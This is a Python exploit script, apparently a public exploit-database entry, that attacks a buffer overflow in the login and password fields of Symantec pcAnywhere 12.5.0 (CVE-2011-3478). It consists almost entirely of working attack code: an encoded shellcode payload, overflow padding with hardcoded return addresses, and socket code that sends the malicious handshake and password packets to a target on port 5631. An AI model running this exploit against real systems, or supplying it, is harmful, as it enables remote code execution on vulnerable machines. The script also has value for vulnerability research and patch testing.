#!/usr/bin/python # Exploit Title: Symantec PcAnywhere login and password field buffer overflow # Date: 2012.06.27 # Author: S2 Crew [Hungary] # Software Link: symantec.com # Version: 12.5.0 # Tested on: Windows XP SP2 # CVE: CVE-2011-3478 # Code : import socket import time import struct import string import sys shell = ( "\xda\xda\xbb\x9e\x7f\xfb\x04\xd9\x74\x24\xf4\x58\x2b\xc9" "\xb1\x56\x31\x58\x18\x03\x58\x18\x83\xc0\x9a\x9d\x0e\xf8" "\x4a\xe8\xf1\x01\x8a\x8b\x78\xe4\xbb\x99\x1f\x6c\xe9\x2d" "\x6b\x20\x01\xc5\x39\xd1\x92\xab\x95\xd6\x13\x01\xc0\xd9" "\xa4\xa7\xcc\xb6\x66\xa9\xb0\xc4\xba\x09\x88\x06\xcf\x48" "\xcd\x7b\x3f\x18\x86\xf0\xed\x8d\xa3\x45\x2d\xaf\x63\xc2" "\x0d\xd7\x06\x15\xf9\x6d\x08\x46\x51\xf9\x42\x7e\xda\xa5" "\x72\x7f\x0f\xb6\x4f\x36\x24\x0d\x3b\xc9\xec\x5f\xc4\xfb" "\xd0\x0c\xfb\x33\xdd\x4d\x3b\xf3\x3d\x38\x37\x07\xc0\x3b" "\x8c\x75\x1e\xc9\x11\xdd\xd5\x69\xf2\xdf\x3a\xef\x71\xd3" "\xf7\x7b\xdd\xf0\x06\xaf\x55\x0c\x83\x4e\xba\x84\xd7\x74" "\x1e\xcc\x8c\x15\x07\xa8\x63\x29\x57\x14\xdc\x8f\x13\xb7" "\x09\xa9\x79\xd0\xfe\x84\x81\x20\x68\x9e\xf2\x12\x37\x34" "\x9d\x1e\xb0\x92\x5a\x60\xeb\x63\xf4\x9f\x13\x94\xdc\x5b" "\x47\xc4\x76\x4d\xe7\x8f\x86\x72\x32\x1f\xd7\xdc\xec\xe0" "\x87\x9c\x5c\x89\xcd\x12\x83\xa9\xed\xf8\xb2\xed\x23\xd8" "\x97\x99\x41\xde\x06\x06\xcf\x38\x42\xa6\x99\x93\xfa\x04" "\xfe\x2b\x9d\x77\xd4\x07\x36\xe0\x60\x4e\x80\x0f\x71\x44" "\xa3\xbc\xd9\x0f\x37\xaf\xdd\x2e\x48\xfa\x75\x38\x71\x6d" "\x0f\x54\x30\x0f\x10\x7d\xa2\xac\x83\x1a\x32\xba\xbf\xb4" "\x65\xeb\x0e\xcd\xe3\x01\x28\x67\x11\xd8\xac\x40\x91\x07" "\x0d\x4e\x18\xc5\x29\x74\x0a\x13\xb1\x30\x7e\xcb\xe4\xee" "\x28\xad\x5e\x41\x82\x67\x0c\x0b\x42\xf1\x7e\x8c\x14\xfe" "\xaa\x7a\xf8\x4f\x03\x3b\x07\x7f\xc3\xcb\x70\x9d\x73\x33" "\xab\x25\x83\x7e\xf1\x0c\x0c\x27\x60\x0d\x51\xd8\x5f\x52" "\x6c\x5b\x55\x2b\x8b\x43\x1c\x2e\xd7\xc3\xcd\x42\x48\xa6" "\xf1\xf1\x69\xe3" ) init1 = ( "\x00\x00\x00\x00" # kezdeti handshake ) init2 = ( "\x0d\x06\xfe" # Enter username uzenet koveti (NTdialog) ) init3 = ( "A" * 100 #+ "\r" #username ) readable_xp_sp2 = struct.pack('<L',0x023E5AD0) call_esi = struct.pack('<L',0x67f7aac4) jmp = struct.pack('<L',0x414112EB) init4 = ( "B" * 1282 + jmp + readable_xp_sp2 + "DDDD" +call_esi + "AAAA" + shell + "E" * (4000 - 1286 - 12 - len(shell)) ) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('172.16.29.133',5631)) # hardcoded IP address print "init packet..." s.send(init1) # send the data time.sleep(5) data = s.recv(1024) print "handshake packet..." s.send(init2) # send the data time.sleep(5) data = s.recv(1024) print "username packet..." s.send(init3) # send the data time.sleep(5) #data = s.recv(1024) print "password packet..." s.send(init4) # send the data s.close()